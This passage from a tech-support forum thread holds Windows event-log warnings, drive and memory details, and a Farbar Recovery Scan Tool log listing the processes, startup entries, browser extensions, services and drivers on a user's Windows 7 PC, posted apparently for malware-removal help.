    Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\scdemu.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

    Date: 2016-03-11 14:21:46.137
    Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\scdemu.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

    Date: 2016-03-11 10:29:37.638
    Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\scdemu.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

    Date: 2016-03-11 10:29:37.607
    Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\scdemu.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

    Date: 2016-03-11 02:34:07.714
    Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\scdemu.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

    Date: 2016-03-11 02:34:07.683
    Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\scdemu.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.


    ==================== Memory info ===========================

    Processor: Intel(R) Core(TM) i5-4440 CPU @ 3.10GHz
    Percentage of memory in use: 70%
    Total physical RAM: 3907.33 MB
    Available physical RAM: 1161.3 MB
    Total Virtual: 7812.86 MB
    Available Virtual: 4844.68 MB

    ==================== Drives ================================

    Drive c: (WIN7) (Fixed) (Total:200 GB) (Free:94.05 GB) NTFS
    Drive e: (PREM) (Fixed) (Total:200.1 GB) (Free:120.86 GB) NTFS
    Drive f: (STUDIO) (Fixed) (Total:200.1 GB) (Free:6.74 GB) NTFS
    Drive g: (New Volume) (Fixed) (Total:331.22 GB) (Free:331.08 GB) NTFS
    Drive h: (Transcend) (Fixed) (Total:931.51 GB) (Free:446.45 GB) NTFS

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: C9C5FB82)
    Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
    Partition 2: (Not Active) - (Size=200 GB) - (Type=07 NTFS)
    Partition 3: (Not Active) - (Size=200.1 GB) - (Type=07 NTFS)
    Partition 4: (Not Active) - (Size=531.3 GB) - (Type=OF Extended)

    ========================================================
    Disk: 1 (MBR Code: Windows XP) (Size: 931.5 GB) (Disk ID: 1B017802)
    Partition 1: (Active) - (Size=931.5 GB) - (Type=07 NTFS)

    ==================== End of Addition.txt ============================
     
  6. blackclaw96

    blackclaw96 TS Rookie Topic Starter

    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
    Ran by WELCOME (administrator) on DIABLO (13-03-2016 13:19:14)
    Running from C:\Users\WELCOME\Desktop
    Loaded Profiles: WELCOME (Available Profiles: WELCOME & Guest)
    Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: Englisch (USA)
    Internet Explorer Version 11 (Default browser: Chrome)
    Boot Mode: Normal
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    (The Within Network, LLC) C:\Windows\UnsignedThemesSvc.exe
    (Intel Corporation) C:\Windows\System32\igfxCUIService.exe
    (Autodesk Inc.) C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgrSvc.exe
    (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
    (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
    (BlueStack Systems, Inc.) C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe
    (BlueStack Systems, Inc.) C:\Program Files (x86)\BlueStacks\HD-UpdaterService.exe
    (Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
    (Autodesk, Inc.) C:\Program Files\Autodesk\Inventor 2015\Moldflow\bin\mitsijm.exe
    () C:\Program Files (x86)\Wi-Fi\WiFiGxSvc.exe
    (Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Cloud Antivirus\PSANHost.exe
    (Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Devices Agent\AgentSvc.exe
    (Visicom Media Inc.) C:\ProgramData\Panda Security URL Filtering\Panda_URL_Filteringb.exe
    (Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Cloud Antivirus\PSUAService.exe
    () C:\Program Files\CyberLink\Shared files\RichVideo64.exe
    (SPEEDbit) C:\Program Files (x86)\SpeedBit Video Accelerator\VideoAcceleratorService.exe
    (Microsoft Corporation) C:\Windows\System32\rundll32.exe
    (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
    (Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IDMan.exe
    () C:\Program Files (x86)\Codebox\BitMeter\BitMeter2.exe
    (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
    (Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Cloud Antivirus\PSUAMain.exe
    (Visicom Media Inc.) C:\ProgramData\Panda Security URL Filtering\Panda_URL_Filtering.exe
    (Microsoft Corporation) C:\Windows\System32\cmd.exe
    (Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe
    (Intel Corporation) C:\Windows\System32\igfxEM.exe
    (Intel Corporation) C:\Windows\System32\igfxHK.exe
    (Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
    (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
    (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
    (Nero AG) C:\Program Files (x86)\Nero\Update\NASvc.exe
    (Tx-Network) C:\Program Files (x86)\Wi-Fi\Wi-Fi.exe
    (Microsoft Corporation) C:\Windows\System32\alg.exe
    (Nullsoft, Inc.) C:\Program Files (x86)\Winamp\winamp.exe
    (Sand Studio) C:\Program Files (x86)\AirDroid\AirDroid.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Microsoft Corporation) C:\Windows\System32\dllhost.exe


    ==================== Registry (Whitelisted) ===========================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13671792 2014-03-14] (Realtek Semiconductor)
    HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2014-02-21] (Intel Corporation)
    HKLM-x32\...\Run: [PSUAMain] => C:\Program Files (x86)\Panda Security\Panda Cloud Antivirus\PSUAMain.exe [37624 2014-05-06] (Panda Security, S.L.)
    HKLM-x32\...\Run: [Panda Security URL Filtering] => C:\ProgramData\Panda Security URL Filtering\Panda_URL_Filtering.exe [235072 2013-04-11] (Visicom Media Inc.)
    HKU\S-1-5-21-3006523739-2206101463-1198655294-1000\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [3565432 2013-03-08] (Tonec Inc.)
    HKU\S-1-5-21-3006523739-2206101463-1198655294-1000\...\Run: [SpeedBitVideoAccelerator] => C:\Program Files (x86)\SpeedBit Video Accelerator\VideoAccelerator.exe [1517224 2016-01-25] (SPEEDbit)
    HKU\S-1-5-21-3006523739-2206101463-1198655294-1000\...\Run: [uTorrent] => C:\Users\WELCOME\AppData\Roaming\uTorrent\uTorrent.exe [2026520 2015-12-03] (BitTorrent Inc.)
    HKU\S-1-5-21-3006523739-2206101463-1198655294-1000\...\Policies\system: [LogonHoursAction] 2
    HKU\S-1-5-21-3006523739-2206101463-1198655294-1000\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
    HKU\S-1-5-21-3006523739-2206101463-1198655294-1000\...\MountPoints2: {28e9f98b-7195-11e5-8079-42a26be3017f} - EXPLORER .\Driver_Auto_Installer_v1.352.00\
    HKU\S-1-5-18\...\Run: [Autodesk Sync] => C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe [1193352 2014-02-19] (Autodesk, Inc.)
    HKU\S-1-5-18\...\RunOnce: [panda4_0dn] => reg.exe delete "HKCU\Software\AppDataLow\Software\panda4_0dn" /f
    HKU\S-1-5-18\...\RunOnce: [panda4_0dn_XP] => reg.exe delete "HKCU\Software\panda4_0dn" /f
    HKU\S-1-5-18\...\RunOnce: [panda4_0dn_DATA_FOLDER] => cmd.exe /c rmdir "C:\ProgramData\Panda Security URL Filtering" /s /q
    HKU\S-1-5-18\...\RunOnce: [panda4_0dn_INSTALL_FOLDER] => cmd.exe /c rmdir "C:\Windows\system32\config\systemprofile\AppData\Local\panda4_0dn" /s /q
    HKU\S-1-5-18\...\RunOnce: [panda] => reg.exe delete "HKCU\Software\AppDataLow\Software\panda" /f
    HKU\S-1-5-18\...\RunOnce: [panda_XP] => reg.exe delete "HKCU\Software\panda" /f
    ShellIconOverlayIdentifiers: [IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2012-11-16] (Tonec Inc.)
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bitmeter2.lnk [2015-10-19]
    ShortcutTarget: Bitmeter2.lnk -> C:\Program Files (x86)\Codebox\BitMeter\BitMeter2.exe ()
    GroupPolicyScripts-x32: Restriction <======= ATTENTION

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    Winsock: Catalog9 01 C:\Program Files (x86)\SpeedBit Video Accelerator\sblsp.dll [177320 2016-01-25] (SPEEDbit)
    Winsock: Catalog9 02 C:\Program Files (x86)\SpeedBit Video Accelerator\sblsp.dll [177320 2016-01-25] (SPEEDbit)
    Winsock: Catalog9 03 C:\Program Files (x86)\SpeedBit Video Accelerator\sblsp.dll [177320 2016-01-25] (SPEEDbit)
    Winsock: Catalog9 04 C:\Program Files (x86)\SpeedBit Video Accelerator\sblsp.dll [177320 2016-01-25] (SPEEDbit)
    Winsock: Catalog9 05 C:\Program Files (x86)\SpeedBit Video Accelerator\sblsp.dll [177320 2016-01-25] (SPEEDbit)
    Winsock: Catalog9 06 C:\Program Files (x86)\SpeedBit Video Accelerator\sblsp.dll [177320 2016-01-25] (SPEEDbit)
    Winsock: Catalog9 07 C:\Program Files (x86)\SpeedBit Video Accelerator\sblsp.dll [177320 2016-01-25] (SPEEDbit)
    Winsock: Catalog9 08 C:\Program Files (x86)\SpeedBit Video Accelerator\sblsp.dll [177320 2016-01-25] (SPEEDbit)
    Winsock: Catalog9 19 C:\Program Files (x86)\SpeedBit Video Accelerator\sblsp.dll [177320 2016-01-25] (SPEEDbit)
    Tcpip\Parameters: [DhcpNameServer] 113.193.12.14 113.193.1.14
    Tcpip\..\Interfaces\{A4E4674C-51BA-4B4D-AFFC-E6DA1B5BD343}: [DhcpNameServer] 113.193.12.14 113.193.1.14
    Tcpip\..\Interfaces\{B13643F6-5835-428B-BF48-38C265892F17}: [NameServer] 8.8.8.8,8.8.4.4
    Tcpip\..\Interfaces\{B13643F6-5835-428B-BF48-38C265892F17}: [DhcpNameServer] 192.168.42.129

    Internet Explorer:
    ==================
    URLSearchHook: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000 - Panda Security Toolbar - {B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} - C:\Program Files (x86)\pandasecuritytb\pandasecurityDx64.dll ()
    URLSearchHook: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000 - Panda Security Toolbar - {B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} - C:\Program Files (x86)\pandasecuritytb\pandasecurityDx.dll ()
    BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2013-01-29] (Internet Download Manager, Tonec Inc.)
    BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2010-03-25] (Microsoft Corporation)
    BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_60\bin\ssv.dll [2015-09-05] (Oracle Corporation)
    BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation)
    BHO: Panda Security Toolbar -> {B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} -> C:\Program Files (x86)\pandasecuritytb\pandasecurityDx64.dll [2014-05-05] ()
    BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_60\bin\jp2ssv.dll [2015-09-05] (Oracle Corporation)
    BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2013-01-29] (Internet Download Manager, Tonec Inc.)
    BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2010-03-25] (Microsoft Corporation)
    BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation)
    BHO-x32: Panda Security Toolbar -> {B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} -> C:\Program Files (x86)\pandasecuritytb\pandasecurityDx.dll [2014-05-05] ()
    Toolbar: HKLM - Panda Security Toolbar - {B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} - C:\Program Files (x86)\pandasecuritytb\pandasecurityDx64.dll [2014-05-05] ()
    Toolbar: HKLM-x32 - Panda Security Toolbar - {B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} - C:\Program Files (x86)\pandasecuritytb\pandasecurityDx.dll [2014-05-05] ()

    FireFox:
    ========
    FF ProfilePath: C:\Users\WELCOME\AppData\Roaming\Mozilla\Firefox\Profiles\kesxh4v3.default
    FF Plugin: @java.com/DTPlugin,version=11.60.2 -> C:\Program Files\Java\jre1.8.0_60\bin\dtplugin\npDeployJava1.dll [2015-09-05] (Oracle Corporation)
    FF Plugin: @java.com/JavaPlugin,version=11.60.2 -> C:\Program Files\Java\jre1.8.0_60\bin\plugin2\npjp2.dll [2015-09-05] (Oracle Corporation)
    FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
    FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin: @videolan.org/vlc,version=2.2.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2015-04-16] (VideoLAN)
    FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2014-04-28] (Adobe Systems)
    FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2013-04-08] ()
    FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2014-06-06] (Google, Inc.)
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-09-16] (Intel Corporation)
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-09-16] (Intel Corporation)
    FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
    FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
    FF Plugin-x32: @Nero.com/KM -> C:\PROGRA~2\COMMON~1\Nero\BROWSE~1\NPBROW~1.DLL [2013-08-20] (Nero AG)
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
    FF Plugin-x32: @videolan.org/vlc,version=2.0.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
    FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
    FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2014-04-28] (Adobe Systems)
    FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npwachk.dll [2011-12-09] (Nullsoft, Inc.)
    FF Extension: SaveFrom.net - helper - C:\Users\WELCOME\AppData\Roaming\Mozilla\Firefox\Profiles\kesxh4v3.default\Extensions\helper-sig@savefrom.net.xpi [2016-03-05]
    FF Extension: Panda Security Toolbar - C:\Users\WELCOME\AppData\Roaming\Mozilla\Firefox\Profiles\kesxh4v3.default\Extensions\{B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} [2015-10-19] [not signed]
    FF HKU\S-1-5-21-3006523739-2206101463-1198655294-1000\...\Firefox\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\WELCOME\AppData\Roaming\IDM\idmmzcc5
    FF Extension: IDM CC - C:\Users\WELCOME\AppData\Roaming\IDM\idmmzcc5 [2015-09-06] [not signed]
    FF HKU\S-1-5-21-3006523739-2206101463-1198655294-1000\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\WELCOME\AppData\Roaming\IDM\idmmzcc5

    Chrome:
    =======
    CHR HomePage: Default -> hxxp://www.google.com
    CHR Profile: C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default
    CHR Extension: (Google Docs) - C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-10-13]
    CHR Extension: (Google Drive) - C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-17]
    CHR Extension: (YouTube) - C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-10-13]
    CHR Extension: (Google Search) - C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-17]
    CHR Extension: (Google Docs Offline) - C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-01-19]
    CHR Extension: (AdBlock) - C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2016-03-11]
    CHR Extension: (Google Keep - notes and lists) - C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\hmjkmjkepdijhoojdojkdfohbdgmmhki [2016-03-08]
    CHR Extension: (IDM Integration) - C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\jmolcgpienlcieaajfkkdamlngancncm [2015-09-07]
    CHR Extension: (FromDocToPDF) - C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk [2016-02-11]
    CHR Extension: (Chrome Web Store Payments) - C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-10-13]
    CHR Extension: (Universe) - C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\oecmlnmneeeeiccpcohlffnipjhngmdk [2015-12-21]
    CHR Extension: (Gmail) - C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-10-13]
    CHR HKLM-x32\...\Chrome\Extension: [jmolcgpienlcieaajfkkdamlngancncm] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2013-01-29]

    ==================== Services (Whitelisted) ========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R2 AdAppMgrSvc; C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgrSvc.exe [576904 2013-12-22] (Autodesk Inc.)
    S2 BstHdAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Service.exe [409304 2014-10-07] (BlueStack Systems, Inc.)
    R2 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [388824 2014-10-07] (BlueStack Systems, Inc.)
    R2 BstHdUpdaterSvc; C:\Program Files (x86)\BlueStacks\HD-UpdaterService.exe [782040 2014-10-07] (BlueStack Systems, Inc.)
    R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [355232 2015-08-09] (Intel Corporation)
    R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed]
    S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
    R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-09-16] (Intel Corporation)
    R2 mitsijm2015; C:\Program Files\Autodesk\Inventor 2015\Moldflow\bin\mitsijm.exe [968480 2013-10-12] (Autodesk, Inc.)
    R2 MyWiFiRouterDHCP; C:\Program Files (x86)\Wi-Fi\WiFiGxSvc.exe [47464 2014-11-18] ()
    R2 NanoServiceMain; C:\Program Files (x86)\Panda Security\Panda Cloud Antivirus\PSANHost.exe [141560 2014-05-05] (Panda Security, S.L.)
    R2 PandaAgent; C:\Program Files (x86)\Panda Security\Panda Devices Agent\AgentSvc.exe [61688 2014-05-22] (Panda Security, S.L.)
    R2 panda_url_filteringService; C:\ProgramData\Panda Security URL Filtering\Panda_URL_Filteringb.exe [244792 2014-05-05] (Visicom Media Inc.)
    R2 PSUAService; C:\Program Files (x86)\Panda Security\Panda Cloud Antivirus\PSUAService.exe [38136 2014-05-06] (Panda Security, S.L.)
    R2 RichVideo64; C:\Program Files\CyberLink\Shared files\RichVideo64.exe [390672 2012-08-08] ()
    R2 UnsignedThemes; C:\Windows\UnsignedThemesSvc.exe [24168 2009-07-13] (The Within Network, LLC)
    R2 VideoAcceleratorService; C:\Program Files (x86)\SpeedBit Video Accelerator\VideoAcceleratorService.exe [298152 2016-01-25] (SPEEDbit)
    R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)

    ===================== Drivers (Whitelisted) ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R2 BstHdDrv; C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [122072 2014-10-07] (BlueStack Systems)
    R3 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283200 2015-10-30] (DT Soft Ltd)
    S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-11] (Broadcom Corporation)
    R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
    S1 ndiskhaz; C:\Windows\System32\DRIVERS\ndiskhaz.sys [30536 2012-12-07] (Khalil Azzouzi)
    R1 NNSALPC; C:\Windows\System32\DRIVERS\NNSAlpc.sys [96800 2014-05-02] (Panda Security, S.L.)
    R1 NNSHTTP; C:\Windows\System32\DRIVERS\NNSHttp.sys [162336 2014-05-02] (Panda Security, S.L.)
    R1 NNSHTTPS; C:\Windows\System32\DRIVERS\NNSHttps.sys [112160 2014-05-02] (Panda Security, S.L.)
    R1 NNSIDS; C:\Windows\System32\DRIVERS\NNSIds.sys [115232 2014-05-02] (Panda Security, S.L.)
    R1 NNSPICC; C:\Windows\System32\DRIVERS\NNSPicc.sys [95776 2014-05-02] (Panda Security, S.L.)
    S4 NNSPIHSW; C:\Windows\System32\DRIVERS\NNSPihsw.sys [70176 2014-05-02] (Panda Security, S.L.)
    R1 NNSPOP3; C:\Windows\System32\DRIVERS\NNSPop3.sys [125984 2014-05-02] (Panda Security, S.L.)
    R1 NNSPROT; C:\Windows\System32\DRIVERS\NNSProt.sys [306720 2014-05-02] (Panda Security, S.L.)
    R1 NNSPRV; C:\Windows\System32\DRIVERS\NNSPrv.sys [169504 2014-05-02] (Panda Security, S.L.)
    R1 NNSSMTP; C:\Windows\System32\DRIVERS\NNSSmtp.sys [115744 2014-05-02] (Panda Security, S.L.)
    R1 NNSSTRM; C:\Windows\System32\DRIVERS\NNSStrm.sys [261152 2014-05-02] (Panda Security, S.L.)
    R1 NNSTLSC; C:\Windows\System32\DRIVERS\NNSTlsc.sys [109088 2014-05-02] (Panda Security, S.L.)
    R3 panda_url_filteringd; C:\ProgramData\Panda Security URL Filtering\panda_url_filteringd.sys [51288 2014-03-20] (Visicom Media Inc.)
    R2 PSINAflt; C:\Windows\System32\DRIVERS\PSINAflt.sys [160800 2014-05-05] (Panda Security, S.L.)
    R2 PSINFile; C:\Windows\System32\DRIVERS\PSINFile.sys [119840 2014-05-05] (Panda Security, S.L.)
    R1 PSINKNC; C:\Windows\System32\DRIVERS\psinknc.sys [195616 2014-05-05] (Panda Security, S.L.)
    R2 PSINProc; C:\Windows\System32\DRIVERS\PSINProc.sys [121888 2014-05-05] (Panda Security, S.L.)
    R2 PSINProt; C:\Windows\System32\DRIVERS\PSINProt.sys [132128 2014-05-06] (Panda Security, S.L.)
    R2 PSINReg; C:\Windows\System32\DRIVERS\PSINReg.sys [106016 2014-05-05] (Panda Security, S.L.)
    R3 PSKMAD; C:\Windows\System32\DRIVERS\PSKMAD.sys [60400 2014-03-25] (Panda Security, S.L.)
    R3 RtlWlanu; C:\Windows\System32\DRIVERS\rtwlanu.sys [1528976 2013-03-05] (Realtek Semiconductor Corporation )
    R0 sptd; C:\Windows\System32\Drivers\sptd.sys [564792 2015-09-07] (Duplex Secure Ltd.)
    R1 txwifinat; C:\Windows\System32\DRIVERS\txwifinat64.sys [35248 2014-12-01] (Nanjing Tongxiang Network Technology Co.,LTD)
    R2 uxpatch; C:\Windows\system32\drivers\uxpatch.sys [30568 2009-07-13] ()
    U3 as0b3ev6; C:\Windows\System32\Drivers\as0b3ev6.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
    S3 cpuz136; \??\C:\Windows\TEMP\cpuz136\cpuz136_x64.sys [X]
    S3 gdrv; \??\C:\Windows\gdrv.sys [X]
    S3 VGPU; System32\drivers\rdvgkmd.sys [X]

    ==================== NetSvcs (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


    ==================== One Month Created files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

